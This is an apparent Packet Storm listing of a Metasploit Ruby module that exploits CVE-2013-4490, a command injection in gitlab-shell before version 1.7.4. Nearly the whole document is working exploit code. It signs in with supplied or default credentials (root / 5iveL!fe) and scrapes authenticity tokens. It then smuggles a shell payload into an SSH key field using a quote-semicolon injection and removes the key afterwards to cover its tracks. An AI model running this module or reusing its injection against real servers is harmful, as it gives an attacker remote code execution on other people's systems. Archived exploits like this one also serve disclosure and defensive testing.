Gitlab-shell Code Execution

2014-08-18T00:00:00
ID PACKETSTORM:127916
Type packetstorm
Reporter Brandon Knight
Modified 2014-08-18T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'net/ssh'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Gitlab-shell Code Execution',  
'Description' => %q(  
This module takes advantage of the addition of authorized  
ssh keys in the gitlab-shell functionality of Gitlab. Versions  
of gitlab-shell prior to 1.7.4 used the ssh key provided directly  
in a system call resulting in a command injection vulnerability. As  
this relies on adding an ssh key to an account valid credentials  
are required to exploit this vulnerability.  
),  
'Author' =>  
[  
'Brandon Knight'  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],  
['CVE', '2013-4490']  
],  
'Platform' => 'linux',  
'Targets' =>  
[  
[ 'Linux',  
{  
'Platform' => 'linux',  
'Arch' => ARCH_X86  
}  
],  
[ 'Linux (x64)',  
{  
'Platform' => 'linux',  
'Arch' => ARCH_X86_64  
}  
],  
[ 'Unix (CMD)',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Payload' =>  
{  
'Compat' =>  
{  
'RequiredCmd' => 'openssl perl python'  
},  
'BadChars' => "\x22"  
}  
}  
],  
[ 'Python',  
{  
'Platform' => 'python',  
'Arch' => ARCH_PYTHON,  
'Payload' =>  
{  
'BadChars' => "\x22"  
}  
}  
]  
],  
'CmdStagerFlavor' => %w( bourne printf ),  
'DisclosureDate' => 'Nov 4 2013',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('USERNAME', [true, 'The username to authenticate as', 'root']),  
OptString.new('PASSWORD', [true, 'The password for the specified username', '5iveL!fe']),  
OptString.new('TARGETURI', [true, 'The path to Gitlab', '/'])  
], self.class)  
end  
  
def exploit  
login  
case target['Platform']  
when 'unix'  
execute_command(payload.encoded)  
when 'python'  
execute_command("python -c \\\"#{payload.encoded}\\\"")  
when 'linux'  
execute_cmdstager(temp: './', linemax: 2800)  
end  
end  
  
def execute_command(cmd, _opts = {})  
key_id = add_key(cmd)  
delete_key(key_id)  
end  
  
def check  
res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))  
if res && res.body && res.body.include?('GitLab')  
return Exploit::CheckCode::Detected  
else  
return Exploit::CheckCode::Unknown  
end  
end  
  
def login  
username = datastore['USERNAME']  
password = datastore['PASSWORD']  
signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')  
  
# Get a valid session cookie and authenticity_token for the next step  
res = send_request_cgi(  
'method' => 'GET',  
'cookie' => 'request_method=GET',  
'uri' => signin_page  
)  
  
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res  
  
local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]  
auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]  
  
if res.body.include? 'user[email]'  
@gitlab_version = 5  
user_field = 'user[email]'  
else  
@gitlab_version = 7  
user_field = 'user[login]'  
end  
  
# Perform the actual login and get the newly assigned session cookie  
res = send_request_cgi(  
'method' => 'POST',  
'cookie' => local_session_cookie,  
'uri' => signin_page,  
'vars_post' =>  
{  
'utf8' => "\xE2\x9C\x93",  
'authenticity_token' => auth_token,  
"#{user_field}" => username,  
'user[password]' => password,  
'user[remember_me]' => 0  
}  
)  
  
fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302  
  
@session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]  
  
fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil?  
end  
  
def add_key(cmd)  
if @gitlab_version == 5  
@key_base = normalize_uri(target_uri.path.to_s, 'keys')  
else  
@key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')  
end  
  
# Perform an initial request to get an authenticity_token so the actual  
# key addition can be done successfully.  
res = send_request_cgi(  
'method' => 'GET',  
'cookie' => "request_method=GET; #{@session_cookie}",  
'uri' => normalize_uri(@key_base, 'new')  
)  
  
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res  
  
auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]  
title = rand_text_alphanumeric(16)  
key_info = rand_text_alphanumeric(6)  
  
# Generate a random ssh key  
key = OpenSSL::PKey::RSA.new 2048  
type = key.ssh_type  
data = [key.to_blob].pack('m0')  
  
openssh_format = "#{type} #{data}"  
  
# Place the payload in to the key information to perform the command injection  
key = "#{openssh_format} #{key_info}';#{cmd}; echo '"  
  
res = send_request_cgi(  
'method' => 'POST',  
'cookie' => "request_method=GET; #{@session_cookie}",  
'uri' => @key_base,  
'vars_post' =>  
{  
'utf8' => "\xE2\x9C\x93",  
'authenticity_token' => auth_token,  
'key[title]' => title,  
'key[key]' => key  
}  
)  
  
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res  
  
# Get the newly added key id so it can be used for cleanup  
key_id = res.headers['Location'].split('/')[-1]  
  
key_id  
end  
  
def delete_key(key_id)  
res = send_request_cgi(  
'method' => 'GET',  
'cookie' => "request_method=GET; #{@session_cookie}",  
'uri' => @key_base  
)  
  
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res  
  
auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]  
  
# Remove the key which was added to clean up after ourselves  
res = send_request_cgi(  
'method' => 'POST',  
'cookie' => "#{@session_cookie}",  
'uri' => normalize_uri("#{@key_base}", "#{key_id}"),  
'vars_post' =>  
{  
'_method' => 'delete',  
'authenticity_token' => auth_token  
}  
)  
  
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res  
end  
end  
`